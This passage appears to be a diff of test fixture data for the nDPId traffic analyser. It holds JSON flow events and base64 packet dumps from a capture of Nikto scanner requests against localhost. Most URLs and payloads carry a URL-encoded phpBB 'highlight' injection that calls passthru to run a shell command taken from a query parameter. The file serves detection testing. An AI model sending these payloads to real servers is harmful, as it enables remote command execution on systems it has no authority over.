mUpIChUZXN0OjAwMTM5MSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01223{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":670,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":670,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277777,"flow_last_seen":1576420277777,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277777,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50902,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} +01223{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":670,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":670,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277777,"flow_last_seen":1576420277777,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277777,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50902,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":671,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":671,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277778,"flow_last_seen":1576420277778,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277778,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50904,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00887{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":671,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":671,"flow_packet_id":1,"flow_last_seen":1576420277778,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"thread_ts_msec":1576420277778,"pkt":"AAAAAAAAAAAAAAAACABFAAFmIsJAAEAGGM5\/AAABfwAAAcbYH5ANfxvlV0uU+oAYAED\/WgAAAQEICp1m\/zqdZv86R0VUIC9tb2R1bGVzL2luZGV4LnBocD9OaWt0bz1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01216{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":671,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":671,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277778,"flow_last_seen":1576420277778,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277778,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50904,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} +01216{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":671,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":671,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277778,"flow_last_seen":1576420277778,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277778,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50904,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":672,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":672,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277780,"flow_last_seen":1576420277780,"flow_idle_time":7580000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277780,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50906,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00888{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":672,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":672,"flow_packet_id":1,"flow_last_seen":1576420277780,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":370,"pkt_l4_len":336,"thread_ts_msec":1576420277780,"pkt":"AAAAAAAAAAAAAAAACABFAAFkWxFAAEAG4IB\/AAABfwAAAcbaH5C23mIrVyENVIAYAED\/WAAAAQEICp1m\/zudZv87R0VUIC9waHBCQi9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTEpDQoNCg=="} -01214{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":672,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":672,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277780,"flow_last_seen":1576420277780,"flow_idle_time":7580000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277780,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50906,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} +01214{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":672,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":672,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277780,"flow_last_seen":1576420277780,"flow_idle_time":7580000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277780,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50906,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":673,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":673,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277781,"flow_last_seen":1576420277781,"flow_idle_time":7580000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277781,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50908,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00888{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":673,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":673,"flow_packet_id":1,"flow_last_seen":1576420277781,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":370,"pkt_l4_len":336,"thread_ts_msec":1576420277781,"pkt":"AAAAAAAAAAAAAAAACABFAAFkNVNAAEAGBj9\/AAABfwAAAcbcH5ACfAx1v1NrvIAYAED\/WAAAAQEICp1m\/z2dZv89R0VUIC9mb3J1bS9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01214{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":673,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":673,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277781,"flow_last_seen":1576420277781,"flow_idle_time":7580000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277781,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50908,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} +01214{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":673,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":673,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277781,"flow_last_seen":1576420277781,"flow_idle_time":7580000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277781,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50908,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":674,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":674,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277782,"flow_last_seen":1576420277782,"flow_idle_time":7580000,"flow_min_l4_payload_len":274,"flow_max_l4_payload_len":274,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":274,"midstream":1,"thread_ts_msec":1576420277782,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50910,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00847{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":674,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":674,"flow_packet_id":1,"flow_last_seen":1576420277782,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":340,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":340,"pkt_l4_len":306,"thread_ts_msec":1576420277782,"pkt":"AAAAAAAAAAAAAAAACABFAAFGytRAAEAGcNt\/AAABfwAAAcbeH5B57PP4Y5pS64AYAED\/OgAAAQEICp1m\/z6dZv8+R0VUIC92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkyKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01183{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":674,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":674,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277782,"flow_last_seen":1576420277782,"flow_idle_time":7580000,"flow_min_l4_payload_len":274,"flow_max_l4_payload_len":274,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":274,"midstream":1,"thread_ts_msec":1576420277782,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50910,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}} +01183{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":674,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":674,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277782,"flow_last_seen":1576420277782,"flow_idle_time":7580000,"flow_min_l4_payload_len":274,"flow_max_l4_payload_len":274,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":274,"midstream":1,"thread_ts_msec":1576420277782,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50910,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":675,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":675,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277784,"flow_last_seen":1576420277784,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420277784,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50912,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00860{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":675,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":675,"flow_packet_id":1,"flow_last_seen":1576420277784,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":349,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":349,"pkt_l4_len":315,"thread_ts_msec":1576420277784,"pkt":"AAAAAAAAAAAAAAAACABFAAFPyZ9AAEAGcgd\/AAABfwAAAcbgH5CxOPC81O+RlYAYAED\/QwAAAQEICp1m\/0CdZv8\/R0VUIC9wb3N0bnVrZS92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkyKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01193{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":675,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":675,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277784,"flow_last_seen":1576420277784,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420277784,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50912,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}} +01193{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":675,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":675,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277784,"flow_last_seen":1576420277784,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420277784,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50912,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":676,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":676,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277785,"flow_last_seen":1576420277785,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":1576420277785,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50914,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00865{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":676,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":676,"flow_packet_id":1,"flow_last_seen":1576420277785,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":354,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":354,"pkt_l4_len":320,"thread_ts_msec":1576420277785,"pkt":"AAAAAAAAAAAAAAAACABFAAFUq9tAAEAGj8Z\/AAABfwAAAcbiH5CAV5MAtOr6\/IAYAED\/SAAAAQEICp1m\/0GdZv9BR0VUIC9wb3N0bnVrZS9odG1sL3ZpZXd0b3BpYy5waHA\/dD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTIpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01199{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":676,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":676,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277785,"flow_last_seen":1576420277785,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":1576420277785,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50914,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}} +01199{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":676,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":676,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277785,"flow_last_seen":1576420277785,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":1576420277785,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50914,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 